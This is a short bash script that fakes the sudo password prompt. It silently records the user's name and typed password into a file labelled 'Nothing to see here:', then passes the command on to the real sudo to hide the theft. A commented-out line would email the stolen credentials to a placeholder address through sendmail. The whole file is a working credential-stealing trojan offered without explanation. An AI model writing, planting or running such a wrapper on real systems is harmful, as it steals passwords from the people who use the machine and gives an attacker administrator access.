#! /bin/bash

read -s -p "[sudo] password for $USER: " password

echo
echo "Nothing to see here:">>creds.txt
echo "$USER:$password">>creds.txt

#echo "$USER:$password" | sendmail -v {user}@{mail}.com

sudo -u $USER -p $password $@
